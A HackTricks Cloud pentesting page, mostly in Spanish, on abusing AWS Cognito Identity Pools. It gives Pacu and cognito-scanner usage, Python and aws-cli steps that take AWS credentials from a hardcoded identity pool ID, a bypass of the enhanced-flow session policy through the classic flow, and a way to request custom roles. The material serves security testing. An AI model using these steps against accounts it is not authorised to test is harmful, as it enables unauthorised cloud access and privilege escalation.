Cognito Identity Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Los grupos de identidad desempeñan un papel crucial al permitir que sus usuarios adquieran credenciales temporales. Estas credenciales son esenciales para acceder a varios servicios de AWS, incluidos, entre otros, Amazon S3 y DynamoDB. Una característica notable de los grupos de identidad es su soporte tanto para usuarios anónimos como para una variedad de proveedores de identidad para la autenticación de usuarios. Los proveedores de identidad compatibles incluyen:

Grupos de usuarios de Amazon Cognito
Opciones de inicio de sesión social como Facebook, Google, Login with Amazon y Sign in with Apple
Proveedores compatibles con OpenID Connect (OIDC)
Proveedores de identidad SAML (Security Assertion Markup Language)
Identidades autenticadas por desarrolladores

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Para generar sesiones de Identity Pool, primero necesitas generar un Identity ID. Este Identity ID es la identificación de la sesión de ese usuario. Estas identificaciones pueden tener hasta 20 conjuntos de datos que pueden almacenar hasta 1MB de pares clave-valor.

Esto es útil para mantener información de un usuario (que siempre estará usando el mismo Identity ID).

Además, el servicio cognito-sync es el servicio que permite gestionar y sincronizar esta información (en los conjuntos de datos, enviando información en flujos y mensajes de SNS...).

Tools for pentesting

Pacu, el marco de explotación de AWS, ahora incluye los módulos "cognito__enum" y "cognito__attack" que automatizan la enumeración de todos los activos de Cognito en una cuenta y marcan configuraciones débiles, atributos de usuario utilizados para el control de acceso, etc., y también automatizan la creación de usuarios (incluido el soporte de MFA) y la escalada de privilegios basada en atributos personalizados modificables, credenciales de pool de identidad utilizables, roles asumibles en tokens de id, etc.

Para una descripción de las funciones de los módulos, consulta la parte 2 del blog post. Para instrucciones de instalación, consulta la página principal de Pacu.

Usage

Ejemplo de uso de cognito__attack para intentar la creación de usuarios y todos los vectores de privesc contra un pool de identidad y cliente de pool de usuarios dados:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Ejemplo de uso de cognito__enum para recopilar todos los grupos de usuarios, clientes de grupos de usuarios, grupos de identidad, usuarios, etc. visibles en la cuenta de AWS actual:

Pacu (new:test) > run cognito__enum

Cognito Scanner es una herramienta CLI en python que implementa diferentes ataques en Cognito, incluyendo la creación no deseada de cuentas y la escalación de grupos de identidad.

Instalación

$ pip install cognito-scanner

Uso

$ cognito-scanner --help

Para más información, consulta https://github.com/padok-team/cognito-scanner

Accediendo a Roles de IAM

No autenticado

Lo único que un atacante necesita saber para obtener credenciales de AWS en una aplicación de Cognito como usuario no autenticado es el ID del Pool de Identidad, y este ID debe estar codificado en la aplicación web/móvil para que se use. Un ID se ve así: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (no se puede forzar por fuerza bruta).

El rol de IAM Cognito no autenticado creado a través de se llama por defecto Cognito_<Nombre del Pool de Identidad>Unauth_Role

Si encuentras un ID de Pool de Identidad codificado y permite usuarios no autenticados, puedes obtener credenciales de AWS con:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

O podrías usar los siguientes aws cli commands:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Tenga en cuenta que, por defecto, un cognito usuario NO AUTENTICADO no puede tener ningún permiso, incluso si se le asignó a través de una política. Consulte la siguiente sección.

Flujo de autenticación mejorado vs básico

La sección anterior siguió el flujo de autenticación mejorado por defecto. Este flujo establece una política de sesión restrictiva para la sesión del rol IAM generada. Esta política solo permitirá que la sesión utilice los servicios de esta lista (incluso si el rol tenía acceso a otros servicios).

Sin embargo, hay una manera de eludir esto; si el grupo de identidades tiene habilitado el "Flujo Básico (Clásico)", el usuario podrá obtener una sesión utilizando ese flujo que no tendrá esa política de sesión restrictiva.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

Si recibes este error, es porque el flujo básico no está habilitado (por defecto)

An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.

Teniendo un conjunto de credenciales de IAM, deberías verificar qué acceso tienes y tratar de escalar privilegios.

Autenticado

Recuerda que a los usuarios autenticados probablemente se les otorguen permisos diferentes, así que si puedes registrarte dentro de la aplicación, intenta hacerlo y obtén las nuevas credenciales.

También podría haber roles disponibles para usuarios autenticados accediendo al Identity Pool.

Para esto, podrías necesitar tener acceso al proveedor de identidad. Si es un Cognito User Pool, tal vez puedas abusar del comportamiento predeterminado y crear un nuevo usuario tú mismo.

El rol autenticado de IAM Cognito creado a través de se llama por defecto Cognito_<Nombre del Identity Pool>Auth_Role

De todos modos, el siguiente ejemplo espera que ya hayas iniciado sesión dentro de un Cognito User Pool utilizado para acceder al Identity Pool (no olvides que otros tipos de proveedores de identidad también podrían estar configurados).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Obtén el identity_id de la respuesta del comando anterior
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# En el IdToken puedes encontrar roles a los que un usuario tiene acceso debido a los Grupos del User Pool
# Usa el --custom-role-arn para obtener credenciales para un rol específico
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

Es posible configurar diferentes roles de IAM dependiendo del proveedor de identidad con el que el usuario esté iniciando sesión o incluso solo dependiendo del usuario (usando claims). Por lo tanto, si tienes acceso a diferentes usuarios a través del mismo o diferentes proveedores, podría valer la pena iniciar sesión y acceder a los roles de IAM de todos ellos.

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousAWS - Cognito Enum NextCognito User Pools

Last updated 3 days ago